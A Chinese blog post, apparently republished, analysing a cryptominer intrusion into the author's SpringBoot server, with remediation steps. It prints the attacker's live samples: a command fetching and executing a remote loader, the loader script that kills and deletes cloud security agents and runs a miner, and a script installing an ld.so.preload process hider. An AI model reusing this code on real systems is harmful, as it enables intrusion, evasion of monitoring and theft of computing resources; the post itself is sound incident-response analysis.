0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

服務(wù)器被入侵挖礦的過程與解決方法

Android編程精選 ? 來源:itlanyan.com ? 作者:tlanyan ? 2022-07-22 16:47 ? 次閱讀
常在河邊走,哪能不濕鞋。自認(rèn)為安全防范意識不錯,沒想到服務(wù)器被入侵挖礦的事情也能落到自己頭上。本文簡要記錄發(fā)現(xiàn)服務(wù)器被入侵挖礦的過程,同時分析木馬的痕跡和信息,最后給出解決方法。

服務(wù)器被入侵挖礦過程

事情經(jīng)過

昨天是周六,睡得比較晚。玩手機(jī)時忽然收到阿里云短信和郵件提醒,服務(wù)器有異常行為:

0021ccc8-0758-11ed-ba43-dac502259ad0.png

一看郵件內(nèi)容就知道不得了,趕緊打開電腦處理。首先用 netstat 命令查看端口,發(fā)現(xiàn)一個異常的端口,但不顯示程序名。這時心里已經(jīng)很清楚,服務(wù)器上的Java程序被遠(yuǎn)程執(zhí)行代碼(RCE),也許還被植入了 rootkit。

首要問題是保障業(yè)務(wù)正??捎?,于是快速拉起另外一個實(shí)例,將業(yè)務(wù)遷移過去。接下來, 首先將被入侵服務(wù)器關(guān)機(jī),然后一步步研究入侵過程,以及其在服務(wù)器上的行為。

入侵行為分析

根據(jù)郵件內(nèi)容,一個 SpringBoot 應(yīng)用被 getshell 并被執(zhí)行遠(yuǎn)程代碼。被執(zhí)行的代碼語句 base64 解碼后為:

	
python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()
將其下載,內(nèi)容如下:
import sysimport osfrom os.path import expanduserver=sys.version
shs='''ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs  -I {}  kill -9 {}
rm -rf /usr/local/aegisrm -rf /usr/local/qcloudrm -rf /usr/local/hostguard/bin
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs  -I {}  kill -9 {}
'''os.system(shs)domainroota="m.windowsupdatesupport.org"#domainroota="192.168.67.131"#$domainroota#curl  http://$domainroota/d/kworkers -o $gitdir/kworkershomedir=expanduser("~")gitdir=""try:    os.mkdir(homedir+"/.git")except Exception as e:    print(e)if os.path.isdir(homedir+"/.git"):    gitdir=homedir+"/.git"try:    os.mkdir("./.git")except Exception as e:    print(e)if os.path.isdir("./.git"):    gitdir="./.git"downloadu="http://{}/d/kworkers".format(domainroota)if ver.startswith("3"):    import urllib.request    with urllib.request.urlopen(downloadu) as f:        html = f.read()        open(gitdir + "/kworkers", 'wb').write(html)else:    import urllib2    with open(gitdir + "/kworkers", 'wb') as f:        f.write(urllib2.urlopen("http://{}/d/kworkers".format(domainroota)).read())        f.close()print ("Download Complete!")os.system("chmod 777 "+gitdir+"/kworkers")if os.path.isfile('/.dockerenv'):    os.system(gitdir+"/kworkers")else:    os.system("nohup {}/kworkers >>{}/.log&".format(gitdir,gitdir))

遠(yuǎn)程代碼主要做了這些事情:

  1. 卸載服務(wù)器上的安全監(jiān)控工具;事后開機(jī),發(fā)現(xiàn)阿里云盾果然被卸載了
  2. 關(guān)掉所有kworkers進(jìn)程;
  3. 在當(dāng)前目錄下創(chuàng)建 .git 目錄,下載并執(zhí)行 kworkers 程序。

上網(wǎng)搜了一下 kworkers,發(fā)現(xiàn)是挖礦應(yīng)用,并非加密勒索等木馬,心里稍微安心一點(diǎn)。通過阿里云后臺監(jiān)控,可以看到木馬入侵后,短時間內(nèi)cpu占用率飆升(本人處理及時,木馬挖礦時間大概持續(xù)5分鐘左右):

002fd930-0758-11ed-ba43-dac502259ad0.png

服務(wù)器殘留痕跡

大概知道了木馬的行為,接著重啟服務(wù)器,查看服務(wù)器上的痕跡。1、查看有無添加定時任務(wù):

	
# crontab -l0 2 * * * /xxx/.git/kworkers
木馬添加了定時啟動任務(wù)。2、進(jìn)入木馬主目錄,發(fā)現(xiàn)下載了如下文件:

003e80ac-0758-11ed-ba43-dac502259ad0.png

此外,上層目錄和家目錄還多了 cert_key.pemcert.pem 兩個文件,分別存放公鑰和密鑰。3、查看木馬留下的日志,有如下內(nèi)容:
/xxx/.git/xxx/.gitworking dir /xxx from pid 23684version not exist downloadDownloaded: http://m.windowsupdatesupport.org/d/downloadversion not exist dbusDownloaded: http://m.windowsupdatesupport.org/d/dbusversion not exist hideproc.shDownloaded: http://m.windowsupdatesupport.org/d/hideproc.sherror exit status 1version not exist sshkey.shDownloaded: http://m.windowsupdatesupport.org/d/sshkey.shversion not exist autoupdateDownloaded: http://m.windowsupdatesupport.org/d/autoupdateversion not exist kworkersKey path not found/xxx/.gitpassfound  protectedpassfound  providedpassfound  +clientpassfound  +clientpassfound  protectedpassfound  providedpassfound  qualitypassfound  (pluspassfound  (digits,passfound  promptfound aksk xxxx xxxxfound aksk xxxx xxxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxlstat /proc/7776/fd/3: no such file or directorylstat /proc/7776/fdinfo/3: no such file or directorylstat /proc/7776/task/7776/fd/3: no such file or directorylstat /proc/7776/task/7776/fdinfo/3: no such file or directorylstat /proc/7776/task/7777/fd/3: no such file or directorylstat /proc/7776/task/7777/fdinfo/3: no such file or directorylstat /proc/7776/task/7778/fd/3: no such file or directorylstat /proc/7776/task/7778/fdinfo/3: no such file or directorylstat /proc/7776/task/7779/fd/3: no such file or directorylstat /proc/7776/task/7779/fdinfo/3: no such file or directorylstat /proc/7776/task/7780/fd/3: no such file or directorylstat /proc/7776/task/7780/fdinfo/3: no such file or directorylstat /proc/7776/task/7781/fd/3: no such file or directorylstat /proc/7776/task/7781/fdinfo/3: no such file or directorylstat /proc/7776/task/7782/fd/3: no such file or directorylstat /proc/7776/task/7782/fdinfo/3: no such file or directorylstat /proc/7776/task/7783/fd/3: no such file or directorylstat /proc/7776/task/7783/fdinfo/3: no such file or directoryrestart cmd  /xxx/.git/kworkers/xxx/.gitpassfound  file,passfound  settingspassfound  file.passfound  callbackspassfound  Callbackpassfound  examplepassfound  promptpassfound  passwordpassfound  informationpassfound  tokenpassfound  tokenpassfound  tokenpassfound  Passwordpassfound  passwordpassfound  passwordpassfound  -basedpassfound  Passwordpassfound  (usingpassfound  field>passfound  retrypassfound  foobarpassfound  foobarpassfound  foobarpassfound  foobarpassfound  foobarpassfound  passwordpassfound  passwordpassfound  foobarpassfound  foobarpassfound  secretrtotal passwords 25xxx.xxx.xxx.xxxlan ipdoscan range  xxx.xxx.0.0/16ping...Receive 24 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 time=496.309μsworking dir /xxx from pid 7792Receive 24 bytes from xxx.xxx.xxx: icmp_seq=0 time=257.973μsxxx.xxx.xxx is alivexxx.xxx.xxx is alivexxx.xxx.xxx:80  openxxx.xxx0xxx:443  openversion  same downloadversion  same dbusrestart dbusexec again dbus downrunkill process pid 23709
process completedversion  same hideproc.shskip restart hideproc.shversion  same sshkey.shskip restart sshkey.shversion  same autoupdateskip restart autoupdateversion  same kworkersKey path not found
根據(jù)日志,主要是下載程序,檢測用戶名和密碼,探測內(nèi)網(wǎng),然后啟動自動更新、隱藏進(jìn)程等程序。
  1. hideproc.sh 感興趣,其內(nèi)容為:

	
if [ "$EUID" -ne 0 ]  then echo "Please run as root"else  if [ `grep libc2.28 /etc/ld.so.preload`  ]  then echo "hideproc already done!!"  else    apt-get update -y    apt-get install build-essential -y    yum check-update    yum install build-essential -y    dnf groupinstall "Development Tools" -y    yum group install "Development Tools"  -y    curl http://m.windowsupdatesupport.org/d/processhider.c -o  processhider.c
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl    mv libc2.28.so /usr/local/lib/ -f    grep libc2.28 /etc/ld.so.preload  || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload    rm -f processhider.c    ls >/tmp/.1  2>&1    grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload  fifi
其首先檢測是否root用戶,然后編譯libc2共享庫,注入隱藏進(jìn)程的代碼。這應(yīng)該是用netstat無法查看到進(jìn)程名的原因。5、查看訪問日志,發(fā)現(xiàn)期間有個IP對服務(wù)器進(jìn)行爆破:

006a9020-0758-11ed-ba43-dac502259ad0.png

其他信息

除了上述文件,/tmp文件夾下還生成了.1和.1.sh文件;

查詢可疑ip,位于國內(nèi)北京市,應(yīng)該是肉雞;

查詢木馬下載域名windowsupdatesupport.org,今年6月注冊,解析ip都在國外。該域名很有混淆性,并且為了方便直接用http訪問;

除了下載木馬文件挖礦,未改變服務(wù)器上的其他數(shù)據(jù)。

服務(wù)器被入侵挖礦解決辦法

雖然知道是 SpringBoot 應(yīng)用觸發(fā)了 RCE,但遺憾目前仍未找到是哪個包導(dǎo)致的漏洞。目前采取的緩解措施為:1、被入侵服務(wù)器重裝系統(tǒng);
2、使用非 root 用戶啟動 SpringBoot 應(yīng)用;
3、被入侵的是子系統(tǒng),增加基本授權(quán):

	
apt install -y apache2-utilshtpasswd /etc/nginx/conf.d/.htpasswd user

然后配置 Nginx 使用認(rèn)證信息:


	
server {  ...  auth_basic  "子系統(tǒng)鑒權(quán):";  auth_basic_user_file /etc/nginx/conf.d/.htpasswd;  ..}

4、防火墻限制對外連接。

上述錯誤能一定程度上避免類似情況再次發(fā)生,但找到應(yīng)用程序中的漏洞才是接下來的重點(diǎn)。

總結(jié)

幸運(yùn)的是這次來的是挖礦木馬,服務(wù)器上的程序和數(shù)據(jù)都未受影響。也很感謝阿里云免費(fèi)的安全提醒,讓我在第一時間處理。

但這次事故也敲醒了警鐘:

  1. 不要隨意用 root 權(quán)限運(yùn)行程序;
  2. 防火墻權(quán)限要嚴(yán)格收緊;
  3. 做好安全監(jiān)控;
  4. 時刻做好數(shù)據(jù)備份。

審核編輯:湯梓紅


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    12

    文章

    9160

    瀏覽量

    85421
  • 木馬
    +關(guān)注

    關(guān)注

    0

    文章

    47

    瀏覽量

    13335
  • 阿里云
    +關(guān)注

    關(guān)注

    3

    文章

    956

    瀏覽量

    43039
  • 挖礦
    +關(guān)注

    關(guān)注

    6

    文章

    448

    瀏覽量

    16058

原文標(biāo)題:記一次服務(wù)器被入侵,沒想到我輕松搞定了它~

文章出處:【微信號:AndroidPush,微信公眾號:Android編程精選】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    服務(wù)器遠(yuǎn)程不上服務(wù)器怎么辦?服務(wù)器無法遠(yuǎn)程的原因是什么?

    產(chǎn)生問題的原因,檢查硬盤和服務(wù)器系統(tǒng)。通過日志和檢查數(shù)據(jù)來確認(rèn)問題出 現(xiàn)的原因以及如何解決。 三、端口問題 1.端口錯誤 找回正確的端口或更換遠(yuǎn)程端口 2.端口掃爆 更改端口,并在防火墻禁止掃爆的IP
    發(fā)表于 02-27 16:21

    服務(wù)器超出了連接范圍的解決方法

    服務(wù)器超出了連接范圍的解決方法終端服務(wù)器超出了最大允許連接解決方法使用遠(yuǎn)程桌面鏈接登錄到終端服務(wù)器時經(jīng)常會遇到“終端
    發(fā)表于 01-06 22:59

    服務(wù)器植入挖礦病毒解決辦法

    服務(wù)器植入挖礦病毒解決辦法上午重啟服務(wù)的時候,發(fā)現(xiàn)程序啟動死慢,用top命令查看了一下,cpu被占用接近100%,所以無法運(yùn)行新程序,通過top命令然后輸入P,就能看到有兩個程序幾乎
    發(fā)表于 08-28 15:50

    TCP服務(wù)器創(chuàng)建過程

    (UCOSIII版本)的基礎(chǔ)上進(jìn)行修改,實(shí)現(xiàn)多客戶端連接的一個方法。1、TCP服務(wù)器創(chuàng)建過程建立一個TCP服務(wù)器需要經(jīng)過創(chuàng)建連接conn=netconn_new(NETCONN_TCP
    發(fā)表于 08-24 08:03

    入侵服務(wù)器的癥狀分析與應(yīng)對方法

    本指南中所謂的服務(wù)器入侵或者說被黑了的意思,是指未經(jīng)授權(quán)的人或程序?yàn)榱俗约旱哪康牡卿浀?b class='flag-5'>服務(wù)器上去并使用其計算資源,通常會產(chǎn)生不好的影響。
    的頭像 發(fā)表于 12-25 10:26 ?3802次閱讀

    服務(wù)器可以挖礦嗎_云服務(wù)器怎么挖礦

    本文對云服務(wù)器的定義、對云服務(wù)器優(yōu)勢進(jìn)行了詳細(xì)分析。最后詳細(xì)的介紹使用云服務(wù)器挖比特幣的教程。
    發(fā)表于 01-08 17:19 ?3w次閱讀
    云<b class='flag-5'>服務(wù)器</b>可以<b class='flag-5'>挖礦</b>嗎_云<b class='flag-5'>服務(wù)器</b>怎么<b class='flag-5'>挖礦</b>

    解析Linux如何判斷自己的服務(wù)器是否入侵的檢測方法

    如何判斷自己的服務(wù)器是否入侵了呢?僅僅靠兩只手是不夠的,但兩只手也能起到一些作用,我們先來看看UNIX系統(tǒng)上一些入侵檢測方法,以LINUX
    的頭像 發(fā)表于 01-13 10:27 ?6006次閱讀

    網(wǎng)絡(luò)診斷提示DNS服務(wù)器未響應(yīng)解決方法

    本文主要介紹了網(wǎng)絡(luò)診斷提示DNS服務(wù)器未響應(yīng)解決方法。DNS服務(wù)器是由域名解析和域名服務(wù)器組成的。域名
    發(fā)表于 01-14 09:37 ?6w次閱讀
    網(wǎng)絡(luò)診斷提示DNS<b class='flag-5'>服務(wù)器</b>未響應(yīng)<b class='flag-5'>解決方法</b>

    win7dns服務(wù)器異常原因及解決方法

    本文主要介紹了win7 dns服務(wù)器異常原因及解決方法。在瀏覽網(wǎng)頁的過程中經(jīng)常出現(xiàn)無法顯示此網(wǎng)頁、找不到服務(wù)器或DNS錯誤,那么我們遇到網(wǎng)頁提示找不到
    發(fā)表于 01-14 09:59 ?3.8w次閱讀
    win7dns<b class='flag-5'>服務(wù)器</b>異常原因及<b class='flag-5'>解決方法</b>

    串口服務(wù)器的常見問題及解決方法

    串口服務(wù)器因?yàn)槠涔δ艿脑?,如今在工控領(lǐng)域有著非常廣泛的應(yīng)用,在實(shí)際使用串口服務(wù)器過程中也會遇到一些問題。下面為大家介紹幾個在使用串口服務(wù)器時經(jīng)常會遇到的問題及
    發(fā)表于 06-16 16:01 ?3080次閱讀

    Linux服務(wù)器入侵導(dǎo)致凍結(jié)的過程

    來自:看雪論壇,作者:Hefe https://bbs.pediy.com/thread-225163.htm 不一會運(yùn)維的同事也到了,氣喘吁吁的說:我們有臺服務(wù)器阿里云凍結(jié)了,理由:對外惡意發(fā)包
    的頭像 發(fā)表于 09-01 16:11 ?3218次閱讀

    獨(dú)立服務(wù)器異常問題及解決方法

    的含義。然而,因?yàn)楠?dú)立服務(wù)器在日常使用的過程中,由于其硬件的復(fù)雜性和不間端性,經(jīng)常會出現(xiàn)很多問題困擾這我們。下面我們就簡單的來說一下獨(dú)立服務(wù)器異常的情況和解決措施。
    的頭像 發(fā)表于 05-05 15:14 ?636次閱讀

    FTP連接重置問題的解決方法與技巧!FTP服務(wù)器連接修復(fù)!

    FTP連接重置問題的解決方法與技巧!FTP服務(wù)器連接修復(fù)! FTP(文件傳輸協(xié)議)是用于在計算機(jī)網(wǎng)絡(luò)環(huán)境中進(jìn)行文件傳輸?shù)某S脜f(xié)議。然而,有時我們可能會遇到FTP連接重置的問題,這會
    的頭像 發(fā)表于 01-12 16:00 ?1.1w次閱讀

    服務(wù)器入侵現(xiàn)象、排查和處理步驟

    近期有一個朋友的服務(wù)器(自己做了網(wǎng)站)好像遭遇了入侵,具體現(xiàn)象是: 服務(wù)器 CPU 資源長期 100%,負(fù)載較高。 服務(wù)器上面的服務(wù)不能正常
    發(fā)表于 03-22 10:56 ?1121次閱讀
    <b class='flag-5'>服務(wù)器</b><b class='flag-5'>入侵</b>現(xiàn)象、排查和處理步驟

    服務(wù)器錯誤是怎么回事?常見錯誤原因及解決方法匯總

    服務(wù)器錯誤是怎么回事?最常見的原因分有六個,分別是:硬件問題、軟件問題、網(wǎng)絡(luò)問題、資源耗盡、數(shù)據(jù)庫、文件權(quán)限問題??梢愿鶕?jù)以下具體錯誤原因進(jìn)行辨別,并選擇適合的解決方法。關(guān)于常見服務(wù)器原因及
    的頭像 發(fā)表于 08-12 10:11 ?1491次閱讀